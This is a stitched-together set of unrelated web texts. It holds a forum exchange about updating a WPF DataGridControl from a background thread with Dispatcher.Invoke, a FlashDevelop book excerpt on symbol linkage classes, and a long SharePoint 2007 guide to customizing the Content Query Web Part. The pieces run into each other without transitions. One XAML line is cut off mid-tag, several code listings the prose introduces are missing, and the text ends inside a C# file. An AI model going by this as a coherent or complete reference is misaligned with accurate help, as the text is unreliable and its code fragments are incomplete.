pyA20EVB 0.2.0
Control GPIO, I2C and SPI
This is written for the A20-SOM, but it can be used with other boards. If you do, we cannot guarantee proper operation of the module. Before using this
package we recommend reading the article at the Olimex wiki:
When using GPIO, make sure that the desired gpio is not used by another peripheral.
GPIO METHODS
============
init() - Initialize the module. Must always be called first.
getcfg() - Read the current configuration of a gpio.
setcfg() - Write configuration to a gpio.
input() - Return the current value of a gpio.
output() - Set the output value.
pullup() - Set pull-up/pull-down.
The available constants are:
NAME - EQUALS TO
==== =========
HIGH -> 1
LOW -> 0
INPUT -> 0
OUTPUT -> 1
PULLUP -> 1
PULLDOWN -> 2
The gpio can be named in two ways:
By port name: PH0, PG2, PE10, etc.
These can be imported from port module:
>>> from pyA20EVB.gpio import port
>>> dir(port)
By connector name and pin number: gpio2p12, gpio3p8, etc.
These can be imported from connector module:
>>> from pyA20EVB.gpio import connector
>>> dir(connector)
Generally these constants are just an offset in memory from the base GPIO address, so they can
be assigned to a numeric variable.
>>> led = port.PH2
>>> print led
226
I2C METHODS
===========
init() - Initialize the module
open() - Begin communication with a slave device
read() - Read from the slave device
write() - Write data to the slave device
close() - End communication with the slave device
SPI METHODS
===========
open() - Open the SPI bus with a given configuration
read() - Read data from the slave device without writing
write() - Write data to the slave device without reading
xfer() - Write and then read
close() - Close the SPI bus
Examples
========
GPIO::
#!/usr/bin/env python
from pyA20EVB.gpio import gpio
from pyA20EVB.gpio import port
from pyA20EVB.gpio import connector
gpio.init() #Initialize module. Always called first
gpio.setcfg(port.PG9, gpio.OUTPUT) #Configure LED1 as output
gpio.setcfg(port.PG9, 1) #This is the same as above
gpio.setcfg(port.PE11, gpio.INPUT) #Configure PE11 as input
gpio.setcfg(port.PE11, 0) #Same as above
gpio.pullup(port.PE11, 0) #Clear pullups
gpio.pullup(port.PE11, gpio.PULLDOWN) #Enable pull-down
gpio.pullup(port.PE11, gpio.PULLUP) #Enable pull-up
while True:
    if gpio.input(port.PE11) == 1:
        gpio.output(port.PG9, gpio.LOW)
        gpio.output(port.PG9, 0)
    else:
        gpio.output(port.PG9, gpio.HIGH)
        gpio.output(port.PG9, 1)
I2C::
#!/usr/bin/env python
from pyA20EVB import i2c
i2c.init("/dev/i2c-2") #Initialize module to use /dev/i2c-2
i2c.open(0x55) #The slave device address is 0x55
#If we want to write to some register
i2c.write([0xAA, 0x20]) #Write 0x20 to register 0xAA
i2c.write([0xAA, 0x10, 0x11, 0x12]) #Do continuous write with start address 0xAA
#If we want to do write and read
i2c.write([0xAA]) #Set address at 0xAA register
value = i2c.read(1) #Read 1 byte with start address 0xAA
i2c.close() #End communication with slave device
SPI::
#!/usr/bin/env python
from pyA20EVB import spi
spi.open("/dev/spidev2.0")
#Open SPI device with default settings
# mode : 0
# speed : 100000 Hz (100 kHz)
# delay : 0
# bits-per-word: 8
#Different ways to open device
spi.open("/dev/spidev2.0", mode=1)
spi.open("/dev/spidev2.0", mode=2, delay=0)
spi.open("/dev/spidev2.0", mode=3, delay=0, bits_per_word=8)
spi.open("/dev/spidev2.0", mode=0, delay=0, bits_per_word=8, speed=100000)
spi.write([0x01, 0x02]) #Write 2 bytes to slave device
spi.read(2) #Read 2 bytes from slave device
spi.xfer([0x01, 0x02], 2) #Write 2 bytes and then read 2 bytes.
spi.close() #Close SPI bus
It's important that you run your python script as root!
Changelog
=========
* pyA20EVB 0.2.0 (03 SEP 2014)
* Initial release
- Author: Stefan Mavrodiev
- License: MIT
- Package Index Owner: selfbg
- DOAP record: pyA20EVB-0.2.0.xml
A preprocessor directive supplies information to the compiler before the program is compiled. Depending on the preprocessor directives, the compiler takes decisions and generates the most optimized code.
A preprocessor directive starts with the # symbol, and as it is not a program statement it does not end with a semicolon (;).
There are many preprocessor directives in C#, and in this article we will look at a few of the most popular ones.
Let us clear up one important concept first: "The compiler takes decisions at compile time with the help of preprocessor directives." Yes, at compile time the compiler evaluates the value of a preprocessor directive. Let us prove that in the example below.
#define Sourav
using System;
namespace Test1
{
    class Program
    {
        static void Main(string[] args)
        {
#if (Sourav)
            Console.WriteLine("Sourav is defined");
#else
            Console.WriteLine("Sourav is not defined");
#endif
        }
    }
}
In this program we have defined Sourav in the first line. Now, when we write the if and else conditions, the statement in the else branch automatically becomes dimmed (inactive) in the IDE. From that it is clear that the compiler takes the decision at compile time. Now we will see a few more examples of preprocessor directives.
Using #define we can define a constant in a program. Try to understand the example below.
#define A
using System;
namespace Test1
{
    class Program
    {
        static void Main(string[] args)
        {
#if (A)
            Console.WriteLine("A is defined somewhere");
#endif
            Console.ReadLine();
        }
    }
}
Using #undef we can undefine any previously defined constant. Let's see the example below.
#define A
#undef A
using System;
namespace Test1
{
    class Program
    {
        static void Main(string[] args)
        {
#if (A)
            Console.WriteLine("A is defined somewhere");
#endif
            Console.WriteLine("A is not defined");
            Console.ReadLine();
        }
    }
}
Here in the first line we have defined A, and in the second line we are forcefully making it undefined. Within Main() we check whether A is defined or not, and the output says that A is not defined in the program.
The #error directive is used to generate a compile-time error. Let's see the example below.
First the constant TrialVersion is defined, and within an #if condition we check whether the version is a trial or not.
When we compile this code it shows the same error that we defined within the #error directive; we can see a red underline below the message.
Like an error message, we can show a user-defined warning in code. Let's see the code below.
As we have used the #warning directive, a green underline is shown below the warning message.
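Neither of these two code listings survived in this copy of the article, so here is a reconstruction from the description above. It is a sketch: the exact message text, and the compiler error numbers in the comments, are my assumptions rather than the author's original code.

```csharp
#define TrialVersion
using System;

namespace Test1
{
    class Program
    {
        static void Main(string[] args)
        {
            // With TrialVersion defined, the compiler emits warning CS1030 here:
#if (TrialVersion)
#warning This is a trial version
#endif
            // An #error directive in the same position would instead stop
            // compilation with error CS1029 and the given message:
            // #error Trial version cannot be compiled
            Console.WriteLine("Compiled with a warning, not an error");
        }
    }
}
```

The warning appears at build time but the program still compiles and runs; replacing #warning with #error makes the build fail outright.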
Fixtures
This is a very simple example; please read something more complex if you need to.
Fixtures are a very powerful way to play with sample data in your database during development. After each python manage.py reset <myapp> command you need to populate the database with sample data again and again using the admin interface. That's quite boring, isn't it? With fixtures, life becomes more comfortable and easy. Look at this example. Let's imagine that you have some data in the DB, so we can dump it. This works even if your models have ForeignKeys or any kind of *To* relations.
First we need to define fixtures dir in settings file:
FIXTURE_DIRS = ( '/path/to/myapp/fixtures/', )
Let's dump our data:
cd /path/to/my_project
python manage.py dumpdata --format=json myapp > /path/to/myapp/fixtures/initial_data.json
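As a side note, the dumped file is a JSON list of serialized objects. For a hypothetical myapp.Article model (the model name and fields here are invented for illustration, not taken from this page), initial_data.json would look roughly like this:

```json
[
  {
    "pk": 1,
    "model": "myapp.article",
    "fields": {
      "title": "Hello fixtures",
      "body": "Sample text",
      "author": 2
    }
  }
]
```

Foreign keys (author here) are dumped as primary-key values, which is why related objects load correctly as long as they are in the same fixture or already in the database.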
Reset:
python manage.py reset myapp
You have requested a database reset. This will IRREVERSIBLY DESTROY any data for the "myapp" application in the database "mydb".
Are you sure you want to do this?
Type 'yes' to continue, or 'no' to cancel: yes
Now we have clean DB, lets populate it with our sample data:
python manage.py syncdb
Loading 'initial_data' fixtures...
Installing json fixture 'initial_data' from '/path/to/myapp/fixtures/'.
Installed 24 object(s) from 1 fixture(s)
Fixture loading
The location where Django loads a fixture from might seem unintuitive. As with template files the fixtures off all applications in a project share the same namespace. If you follow [source:django/trunk/django/core/management/commands/loaddata.py?rev=9770#L79 loaddata.py] you see that Django searches for
*appnames*/fixtures and
settings.FIXTURE_DIRS and loads the first match. So if you use names like
testdata.json for your fixtures, you must make sure that no other active application uses a fixture with the same name. Otherwise, you can never be sure which fixtures you actually load.
Therefore it is suggested that you prefix your fixtures with the application names, e.g.
myapp/fixtures/myapp_testdata.json .
Known bugs in Python 2.2
Real bugs
These are actual bugs, and we will make fixes available as soon as we have them. (There may be other bugs that aren't generally worth knowing about; search the SourceForge bug tracker; you can also use that to report new bugs you find, of course.)
- The -Qnew option is implemented incompletely: it turns / into true division, but unfortunately not /=. See SourceForge bug report #496549.
- Attempting to pickle the result of time.localtime() causes infinite recursion. See SourceForge bug report #496873.
- In Python 2.1, the StringIO module (though not cStringIO) supported Unicode. This capability is accidentally not present in Python 2.2.
- A deep copy (using copy.deepcopy()) of a recursive data structure built out of new-style classes would cause infinite recursion. See SourceForge bug report #497426.
- The Demo/extend subdirectory should not have been shipped; it contains an obsolete example. To build extensions, you should use distutils, which is documented extensively in the standard documentation bundle ("Distributing Python Modules").
Incompatibilities between Python 2.1[.1] and Python 2.2
The following visible differences between Python 2.2 and previous versions are intentional.
- Not everything is listed here; for the full list see the Misc/NEWS file in the distribution.
- Not listed here are various deprecated modules and features that may issue warnings: the warnings shouldn't affect the correct execution of your program, and they can be disabled with a command line option or programmatically; see the documentation for the warnings module.
- Also not listed are new constructs that used to be an error (e.g. "key in dict" is now a valid test where formerly it would always raise an exception).
- The special attributes __members__ and __methods__ are no longer supported (for most built-in types). Use the new and improved dir() function instead.
- type("").__name__ == "str" # was "string"
- type(0L).__name__ == "long" # was "long int"
- Overflowing int operations return the corresponding long value rather than raising the OverflowError exception.
- Conversion of long to float now raises OverflowError if the long is too big to represent as a C double. This used to return an "infinity" value on most platforms.
- An old tokenizer bug allowed floating point literals with an incomplete exponent, such as 1e and 3.1e-. Such literals now raise SyntaxError.
- Nested scopes are standard in 2.2 (they were enabled per module through "from __future__ import nested_scopes" in 2.1[.1]). This may change the meaning of code like the following:
def f(str):
    def g(x):
        return str(x)
    return g
In this example, the use of str inside the inner function g() now refers to the argument str in the outer function f(); previously (without nested scopes), it would refer to the built-in function str.
- Unbound method objects have their im_class field set differently. In previous versions, the im_class field was set to the class that defined the method. Now it is set to the class that was used to create the method object. For example:
class A:
    def meth(self): ...

class B(A): ...  # doesn't define meth

class C(A):
    def meth(self):
        B.meth(self)  # error, C doesn't inherit from B
- The C API to the GC module has changed incompatibly. Extensions written to support the 2.1 version of the GC module will still compile, but the GC feature will be disabled.
- The contents of gc.garbage is different; it used to contain all uncollectible cycles; now it contains only objects in uncollectible cycles with a __del__ method.
- The hash order of dict items is different than in previous versions. (No code should rely on this order, but it's easy to forget this.)
- Assignment to __debug__ raises SyntaxError at compile-time.
- The UTF-16 codec was modified to be more RFC compliant. It will now only remove BOM characters at the start of the string, and then only if running in native mode (UTF-16-LE and -BE won't remove a leading BOM character).
- Many error messages are different; in some cases an error condition raises a different exception (most common are cases where TypeError and AttributeError are swapped).
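Of the incompatibilities above, the nested-scopes item is easy to demonstrate; the shadowing behavior it describes still holds in modern Python:

```python
def f(str):              # the parameter named "str" shadows the builtin
    def g(x):
        return str(x)    # with nested scopes, this is f's parameter
    return g

g = f(lambda x: "shadowed")
print(g(42))             # prints "shadowed", not "42"
```

Passing the real builtin back in (f(str)) restores the usual conversion, which shows the lookup really does go through the enclosing scope.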
Differences between classic classes and new-style classes
- The method resolution order is different; see the tutorial.
- New-style class instances allow assignment to their __class__ attribute only if the C-level structure layout of the old and new class are the same. This prevents disasters like taking a list and changing its __class__ to make it a dict.
- New-style class objects don't support assignment to their __bases__ attribute.
- (I'm sure there are more differences relevant to the conversion of classic classes to new-style classes, but I can't think of them right now.)
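The __class__ assignment restriction listed above can be checked directly; current Python versions behave the same way:

```python
class A: pass
class B: pass

a = A()
a.__class__ = B          # allowed: A and B have the same C-level layout
assert isinstance(a, B)

x = []
try:
    x.__class__ = dict   # disallowed: list and dict have different layouts
    changed = True
except TypeError:
    changed = False
assert changed is False  # the assignment is rejected
```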
To report a bug not listed above, always use the SourceForge Bug Tracker. If you have a patch, please use the SourceForge Patch Manager. Please mention that you are reporting a bug in 2.2! | http://www.python.org/download/releases/2.2/bugs/ | CC-MAIN-2013-20 | refinedweb | 827 | 58.58 |
import mx.transitions.Tween;
import mx.transitions.easing.*;

createEmptyMovieClip("friend_mc", 1);

function loadXML(loaded) {
    if (loaded) {
        xmlNode = this.firstChild;
        friendText = [];
        total = xmlNode.childNodes.length;
        for (i = 0; i < total; i++) {
            friendText[i] = xmlNode.childNodes[i].childNodes[0].nodeValue;
            var intStringLength = friendText[i].length;
            var intStringMaxWidth = intStringLength * 13;
            var intMaxXPos = 850 - intStringMaxWidth;
            var intRanXPos = Math.round(Math.random() * intMaxXPos);
            var intRanYPos = Math.round(Math.random() * 380);
            friend_mc.createTextField("friendName_txt", 1, intRanXPos, intRanYPos, intStringMaxWidth, 41);
            friend_mc.friendName_txt.text = friendText[i];
            friend_mc.friendName_txt.embedFonts = true;
            friendformat = new TextFormat();
            friendformat.font = "Brush Script MT";
            friendformat.color = 0x006633;
            friendformat.size = 30;
            friendformat.bold = true;
            friend_mc.friendName_txt.setTextFormat(friendformat);
            var visInTween:Tween = new Tween(friend_mc.friendName_txt, "_alpha", Regular.easeOut, 0, 100, 30, false);
            //var visOutTween:Tween = new Tween(friend_mc.friendName_txt, "_alpha", Regular.easeOut, 100, 0, 30, false);
        }
        friendNames();
    } else {
        content = "file not loaded!";
    }
}

xmlData = new XML();
xmlData.ignoreWhite = true;
xmlData.onLoad = loadXML;
xmlData.load("friends.xml");

-------------------------------------------------------------
friends.xml format:

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<friends>
    <friend>Friend 1</friend>
    <friend>Friend 2</friend>
    <friend>Friend 3</friend>
    etc.....
</friends>
Thank you very much for your help on this!! I truly appreciate it! I tried the code you posted, and I am getting an error: "There is no property with the name 'onMotionFinished'. visInTween.onMotionFinished"
Thanks again
MX... wow that's old : )
i included a very old (6 years) prototype that'll do the same thing.
Yeah, it is old, hehe, I'd like to get into this a lot more in the future, which should justify a newer version, but for now....
I tried the new code you gave, and I am still not seeing anything on the stage when it is run. I added a trace statement after the "strings.push(current);" line of code (trace (current);). When I run that, all of the strings from the .xml file are shown correctly in the trace window. I then tried a trace statement after the "textfield.text = current;" line of code (I tried both trace (textfield.text); and trace (textfield);) and both only yielded "undefined" in the trace box.
Again, thank you very much for your help with this!!!
Russ
you can also try setting the text immediately to something random ("Hello World") to make sure it's rendering.
ahh wait... MX doesn't return a reference to the textfield...
try changing line 43 from :
var textfield = container.createTextField(
to :
container.createTextField(
try that with the traces you have currently...
see normally (in every language but AS2 for FP7), you can say someVar = something();
but for unknown reasons in MX, createTextField didn't return a reference, so that's probably coming up empty...
change line 43 from :
var textfield = container.createTextField(
to :
container.createTextField(
var textfield = container.textfield;
working snippet attached
Thank you very much!! When I comment out the "textfield.embedFonts = true;" line of code it works! I need to do a little more work on the tween variables, but it is working and I sincerely thank you!! I have been wanting to get this going for quite some time, as I will be using it on a site that promotes a golf outing fund raiser my family and I host each year to help fight cancer. I truly appreciate all of your help and wish you all the best!! :)
Russ | https://www.experts-exchange.com/questions/26431061/ActionScript-2-load-text-from-xml-and-loop.html | CC-MAIN-2018-09 | refinedweb | 577 | 62.64 |
holding does not work as intended
Hello everyone, I am not a native speaker, so I am not too sure about how to express the problem I have, although I will certainly give my best to do so.
I was experimenting with sage a bit and wanted it to generate an overview of a specific simplification of specific root expressions, namely
sqrt(a + sqrt(b)) == sqrt(c) + sqrt(d) this simplification is possible under certain restraints for integers a and b, but that is not the point here.
For that matter I wanted to create a list of Tuples containing the expression exactly as written above and the corresponding boolean.
I therefore defined a function like this:
def test_cases(a): bs_cs_ds = [\ (SR(4*n*m), SR(n), SR(m))\ for (n,m) in [(x, a-x)\ for x in [1..floor(a/2)]]] expressions = [\ SR(a).add(sqrt(SR(b),hold=True),hold=True).sqrt(hold=True)\ == sqrt(SR(c), hold=True).add(sqrt(SR(d), hold=True), hold=True)\ for b,c,d in bs_cs_ds] return [(expr, bool(expr)) for expr in expressions]
So in my opinion I hold the evaluations/simplification for all possible functions (add and sqrt). But for some reason sage will still try to simplify the expressions. For example the input
test_cases(4)[1]
returns
(sqrt(4 + 4) == sqrt(2) + sqrt(2), True), instead of
(sqrt(4 + sqrt(16)) == sqrt(2) + sqrt(2), True).
So I apparently do not understand how holding works. I was under the impression, that it stops the evaluation/simplification for the given function or expression?
tl;dr:
SR(a).add(SR(sqrt(SR(b), hold=True)), hold=True).sqrt(hold=True) does not return the expression
sqrt(a + sqrt(b)) (one without any simplifications) for integers a,b, as I would expect for my input. But instead simplifies the inner root by factoring out etc.
To formulate a question: Can somebody correct my code to result in the intended behavior, or at least explain why Sage does not behave as expected from my point of view? | https://ask.sagemath.org/question/52230/holding-does-not-work-as-intended/ | CC-MAIN-2020-45 | refinedweb | 346 | 52.49 |
- Workers of the World
- Lock the Door Behind You
- On One Condition
- Reading, Writing, and Arithmetic
- Loose Threads
So far in this series we’ve looked at spawning new processes and communicating among them. Processes are the traditional mechanism for parallelism on UNIX platforms. Recently, however, the POSIX threading APIs have gained widespread support. Unlike processes created using fork(2), threads spawned with pthread_create(3) exist in the same address space as their parent.
Older versions of Linux relied on a userspace implementation provided by glibc. This technique put all of a process’s threads in the same kernel-scheduled entity and used timer signals to switch between them. More recent versions use the clone(2) system call, which is similar to fork(2) but allows the child process to share the parent’s address space. Other UNIX-like systems have similar mechanisms, although some use a N:M kernel-scheduled entities-to-threads mapping. This enables threads that spend most of their time waiting for data to be multiplexed onto a single kernelspace entity, while allowing CPU-limited ones to be scheduled independently. On paper, this strategy has a number of advantages, although in practice it is harder to get right.
Workers of the World
The primary reason for creating a thread is to get some work done in the background. Since the main way of getting work done in a C program is to call a function, the pthread_create(3) call takes a function as an argument and runs that function in a separate thread.
The function passed to the pthread_create(3) call takes a pointer as an argument, and returns a pointer. This pointer can later be retrieved using the pthread_join(3) function. This setup allows you to implement futures quite easily; your parent thread calls a function in a new thread, does some other work, and then waits for the worker thread to finish.
Listing 1 contains a simple program for determining whether a number is prime.
Listing 1 primes.c.
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <math.h>

#define PRIME 0
#define NOT_PRIME 1

void * make_sieve(int* numbers)
{
    char * sieve = calloc(*numbers, sizeof(char));
    int test_max = sqrt(*numbers) + 1;
    //From the definition of prime numbers:
    sieve[0] = sieve[1] = NOT_PRIME;
    //Create the sieve
    for(int i=2 ; i<test_max ; i++)
    {
        //If the current number is prime, try dividing all
        //subsequent potential primes by it
        if(sieve[i] == PRIME)
        {
            //Any number which is a product of a prime number
            //is not prime itself
            for(int j=i+i ; j<*numbers ; j+=i)
            {
                sieve[j] = NOT_PRIME;
            }
        }
    }
    return sieve;
}

int main(void)
{
    pthread_t thread;
    int max = 20000;
    int test_number;
    char* sieve;
    //Spawn a thread to create the sieve
    pthread_create(&thread, NULL, (void*(*)(void*))make_sieve, (void*)&max);
    printf("Enter a number: ");
    scanf("%d", &test_number);
    //Collect the sieve
    pthread_join(thread, (void**)&sieve);
    //Check that the entered number is in range
    if(test_number >= max)
    {
        test_number = max-1;
    }
    if(sieve[test_number] == PRIME)
    {
        printf("\n%d is prime.\n", test_number);
    }
    else
    {
        printf("\n%d is not prime.\n", test_number);
    }
    return 0;
}
When you run this program, it spawns a worker thread that crease a Sieve of Eratosthenes—an array indicating whether a range of numbers is prime. This process happens in the background while the program asks the user to enter a number. Once the user has entered the number, the main thread waits for the worker thread to finish and then uses the result to see whether the entered number is prime.
Note that the signature of the make_sieve() function doesn’t match that expected by the pthread_create(3) function. Because both accept a pointer, however, we can cast it to the correct form and receive no errors.
The pthread_create(3) call used in this program looks like this:
pthread_create(&thread, NULL, (void*(*)(void*))make_sieve, (void*)&max);
- The first argument is a pointer to a pthread_t that’s set to an identifier for this thread. Future thread operations should use this identifier to identify the created thread.
- The second argument specifies some attributes for the thread. This can be an attribute set created with the pthread_attr_*(3) family of functions, or NULL for the default options.
- The third and fourth arguments are the function to start and the argument to pass to it, respectively. Notice that we put in an explicit cast here so that our function can receive an int* rather than a void*. | http://www.informit.com/articles/article.aspx?p=686610&seqNum=2 | CC-MAIN-2019-35 | refinedweb | 737 | 59.33 |
I was searching for a file transfer program using Winsock with TCP and UDP. I found some code, but it was complex and most of it was MFC-based. So the problem was to convert it to a non-MFC program.
Another point: the code should also be compatible with Linux sockets (sys/socket.h). All my code is compatible with GNU's gcc compiler, except some of the error handling.
I have found that most projects here are quite complex for a beginner like me to understand. So I collected easy examples, especially from MSDN, and created a simple project.
It is so simple that people will say it's just child's code. Nothing more than that.
I have avoided writing many comments, so it's easy to see the code steps. This is wrong, I know, but this is the way I write programs. I am also too lazy to do such things.
Gradually I will comment all my code.
This is a program which implements Winsock 2.0. It has a utility class WComm with very simple methods to create a client/server program as well as a file transfer utility.
Given below are very simple steps, in very simple words, to start a client/server Winsock application.
This sample project has a main program which implements both client and server, according to the argument passed.
In the server code, there is a loop which listens for a client; when it gets the client connection, it moves to another loop where it gets the client's responses.
The client code is very simple: it just connects, sends and receives data, and ends.
Actually, everything is very simple. One might notice that the error handling is not good. This is because the code is made to be more readable. This is the starting point; now go ahead and implement whatever you want with it.
#include "wcomm.h"
void runclient(char *ip, char *fpath);
void runserver();
WComm w;
void main(int argc, char *argv[])
{
if(argc==1)runserver();
else runclient(argv[1],argv[2]);
}
void runserver()
{
// Start Server Daemon
w.startServer(27015);
printf("Server Started........\n");
while (TRUE) {
// Wait until a client connects
w.waitForClient();
printf("Client Connected......\n");
// Work with client
while(TRUE)
{
char rec[50] = "";
w.recvData(rec,32);w.sendData("OK");
if(strcmp(rec,"FileSend")==0)
{
char fname[32] ="";
w.fileReceive(fname);
printf("File Received.........\n");
}
if(strcmp(rec,"EndConnection")==0)break;
printf("Connection Ended......\n");
}
// Disconnect client
w.closeConnection();
}
}
void runclient(char *ip, char *fpath)
{
char rec[32] = "";
// Connect To Server
w.connectServer(ip,27015);
printf("Connected to server...\n");
// Sending File
w.sendData("FileSend"); w.recvData(rec,32);
w.fileSend(fpath);
printf("File Sent.............\n");
// Send Close Connection Signal
w.sendData("EndConnection");w.recvData(rec,32);
printf("Connection ended......\n");
}
Hope you will do much better than what I did.... :-)
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
A list of licenses authors might use can be found here
send( m_socket, filename, strlen(filename), 0 );
send( m_socket, filename, 32, 0 );
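The two send calls above (from the article's discussion) contrast a variable-length send with a fixed-width one. Padding the filename to a fixed 32 bytes means the receiver can issue a single recv of a known size instead of parsing a delimiter. A minimal POSIX sketch of that idea, using a local socketpair instead of a real TCP connection (the function names are mine, not from the article):

```cpp
#include <sys/socket.h>
#include <cstring>

// Send the filename as a fixed 32-byte, zero-padded field; the receiver
// then needs exactly one recv() of a known size to get the whole name.
void send_filename(int sock, const char* name)
{
    char field[32] = {0};
    strncpy(field, name, sizeof(field) - 1);  // always zero-terminated
    send(sock, field, sizeof(field), 0);      // always 32 bytes on the wire
}

void recv_filename(int sock, char* out /* at least 32 bytes */)
{
    recv(sock, out, 32, 0);                   // one read of a known size
}
```

The same framing trick is what makes the article's fileSend/fileReceive pair simple: fixed-size header fields first, then the raw file bytes.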
#include "stdafx.h"
#include "winsock2.h"
#include <stdio.h>
#include <conio.h>
#include <iostream>
#include <fstream>
This is cool and greatly simplify things. So let me make sure I
understand,
I'll need WTP 1.5.1 to work with your fix (devtools 93). WTP 1.5.1 is
required for both build time and run time. Is this correct?
TIA, Lin
_____
From: Sachin Patel [mailto:sppatel@gmail.com] On Behalf Of Sachin Patel
Sent: Thursday, August 03, 2006 4:28 PM
To: user@geronimo.apache.org
Subject: Re: Use a different repo.
This Mojo shouldn't be used and will be removing it in trunk. I just
changed the installable runtime extension point in wtp (available in 1.5.1
builds). So you now no longer have to wrap the entire runtime binary inside
a plugin. And you installable runtime feature would simply contain a single
data entry instead of the plugin entry. Then in your update site (site.xml)
you map the data entry to whatever url your runtime is located at.
See the installableRuntime extension point defintion in WTP 1.5.1 driver for
an example.
On Aug 3, 2006, at 3:22 PM, Lin Sun wrote:
Hi Sachin,
I'd like to use my own repo (siteRoot below) to get the server image.
* @goal getg
*/
public class GetGMojo extends AbstractMojo {
/**
* @parameter expression=""
*/
private URL siteRoot;
Is there a better way to do it other than update the value of expression in
GetGMojo.java?
Thanks, Lin
-sachin | http://mail-archives.apache.org/mod_mbox/geronimo-user/200608.mbox/%3C002301c6b7f9$93699df0$eeea4109@raleigh.ibm.com%3E | CC-MAIN-2017-34 | refinedweb | 235 | 68.47 |
I found the previous investigation in the comments to uima-2560.
I can confirm that when running with the ruta-ep-engine built with embedded jars
approach, that this doesn't work for 3.7.2. I think what happens is the launch
configuration puts the target/classes folder into the bundle classpath, and the
bundle classpath loader is missing the facility to work with embedded jars
there. This is fixed in later Eclipse releases.
As the comment in uima-2560, this is even extended in 4.2 (?) versions of
Eclipse to work even if the Jars aren't in the target/classes, using some new
kinds of manifest instruction which specifies where to get the jars from maven.
I also found that if I copied just the ruta-ep-engine's built Jar file (with
embedded Jars) into Eclipse's "dropins" folder and restarted, and then changed
the Eclipse Application "launch" configuration to (a) launch with plug-ins
selected below only, and then *unchecked* in the "Workspace" section the
ruta-ep-engine, and *checked* in the Target Platform section the
org.apache.uima.ruta.engine, which causes the Jar to be used, then the launcher
worked find in 3.7.2.
-Marshall
On 9/4/2013 11:23 AM, Marshall Schor wrote:
> never mind- found it via doing mvn dependency:tree.
>
> mvn dependency:analyze reports warnings; I don't know if these are OK or not...
>
> [INFO] --- maven-dependency-plugin:2.8:analyze (default-cli) @ ruta-ep-ide ---
> [WARNING] Used undeclared dependencies found:
> [WARNING] org.eclipse.equinox:registry:jar:3.5.101:provided
> [WARNING] org.eclipse:jface:jar:3.7.0:provided
> [WARNING] org.eclipse.ui:workbench:jar:3.7.1:provided
> [WARNING] org.eclipse:osgi:jar:3.7.2:provided
> [WARNING] org.eclipse.equinox:common:jar:3.6.0:provided
> [WARNING] org.apache.uima:uimaj-core:jar:2.4.2:compile
> [WARNING] org.antlr:antlr-runtime:jar:3.5:compile
> [WARNING] Unused declared dependencies found:
> [WARNING] org.eclipse.dltk.validators:core:jar:3.0.0:provided
> [WARNING] org.eclipse:ui:jar:3.7.0:provided
> [WARNING] org.eclipse.swt:org.eclipse.swt.win32.win32.x86:jar:3.2.1:provided
> [WARNING] org.eclipse.equinox:app:jar:1.3.100:provided
> [WARNING] org.eclipse.emf.ecore:xmi:jar:2.7.0:provided
> [WARNING] org.eclipse.jdt:launching:jar:3.6.1:provided
> [INFO] ------------------------------------------------------------------------
> [INFO] BUILD SUCCESS
>
> On 9/4/2013 11:15 AM, Marshall Schor wrote:
>> ok, working on trying to understand the 1st class-not-found - the antlr char
>> stream one.
>> (I got that when I tried to run.)
>>
>> I see that comes from trying to load the RutaSourceParser java class, which has
>> references to org.antlr.runtime things, including CharStream.
>>
>> In the Eclipse source for that project (ruta-ep-ide), I thought I would see a
>> dependency on org.antlr.runtime in the dependencies section - but it's commented
>> out.
>>
>> I don't see how this dependency is being put on the build path (it is on the
>> build path, I checked). Can you enlighten me on this?
>>
>> -Marshall
>> On 9/4/2013 10:34 AM, Peter Klügl wrote:
>>> On 04.09.2013 16:10, Marshall Schor wrote:
>>>> I found the problem: When I got to the step:
>>>>
>>>> - right click on the script folder and create a new UIMA Ruta script file,
e.g. Test
>>>>
>>>> I must have right clicked on the folder, and used the menu pick "new
>>>> file", instead of "new UIMA Ruta file".
>>>>
>>>> I tried again, and can get it to run.
>>>>
>>>> So, now back to the original problem - I'll have a look at getting it to
run as
>>>> an Eclipse Application without installing it from Eclipse - that's the issue,
>>>> correct?
>>> Yes, I think that eclipse 3.7.2 (or m2e) cannot resolve the inlined jars
>>> in development mode.
>>>
>>> Peter
>>>
>>>> -Marshall
>>>>
>>>> On 9/4/2013 8:04 AM, Peter Klügl wrote:
>>>>> Hmm, cannot reproduce it.
>>>>>
>>>>> Here's what I did:
>>>>>
>>>>> - mvn clean package the update site in Eclipse 3.7.2
>>>>> - installed the feature in another Eclipse 3.7.2 that already contains
>>>>> uima-tooling (was 2.4.1, but I do not think that makes a difference)
>>>>> - created project, created script file, created test file, launched
>>>>> debug, checked rule matches
>>>>>
>>>>> In your case, there was no exception? The line in the ruta code is:
>>>>>
>>>>> XMLInputSource in = new XMLInputSource(descriptorUrl);
>>>>>
>>>>> Best,
>>>>>
>>>>> Peter
>>>>>
>>>>>
>>>>> On 04.09.2013 13:41, Peter Klügl wrote:
>>>>>> On 04.09.2013 04:51, Marshall Schor wrote:
>>>>>>> Hi,
>>>>>>>
>>>>>>> Here's a fundamental question / confusion I'm having.
>>>>>>>
>>>>>>> It looks like the ruta-ep-engine is a collection of plain Jars
packaged up as
>>>>>>> one big OSGi bundle exporting a bunch of packages needed by Ruta.
The reason
>>>>>>> this packaging is needed is to turn these non-OSGi Jars into
(one) OSGi Bundle
>>>>>>> (Jar), so that Eclipse bundle resolution mechanism can knit these
together with
>>>>>>> other dependencies other OSGi plugins might need.
>>>>>>>
>>>>>>> Since the uimaj-ep-runtime Jar is already an Eclipse / OSGi bundle,
I think
>>>>>>> there's no reason to embed it. It will just be another exporter
of packages
>>>>>>> that other bundles can "import".
>>>>>>>
>>>>>>> I ran the build the way it is currently set up (without uimaj-ep-runtime
being
>>>>>>> embedded), and I also ran the ruta-eclipse-update-site build
so I could really
>>>>>>> install the result.
>>>>>>>
>>>>>>> Then I used the resulting update site to install ruta into a
3.7.2 Eclipse with
>>>>>>> UIMA 2.4.2 Eclipse tools (including the uimaj-ep-runtime).
>>>>>> My initial concern was that it works when installed but not when
started
>>>>>> using the sources.
>>>>>>
>>>>>>
>>>>>>> It appeared to install OK, and I tried to follow your instructions
for testing.
>>>>>>> This seemed to work, no obvious errors, but when I tried to run,
I may not have
>>>>>>> set things up right because I got:
>>>>>>>
>>>>>>> a connect window with a message "Source not found for
>>>>>>> FileURLConnection.connect() line: 101"
>>>>>>> and a stack trace in the console:
>>>>>>> FileURLConnection.connect() line: 101 [local variables unavailable]
>>>>>>> FileURLConnection.getInputStream() line: 189
>>>>>>> XMLInputSource.<init>(URL) line: 120
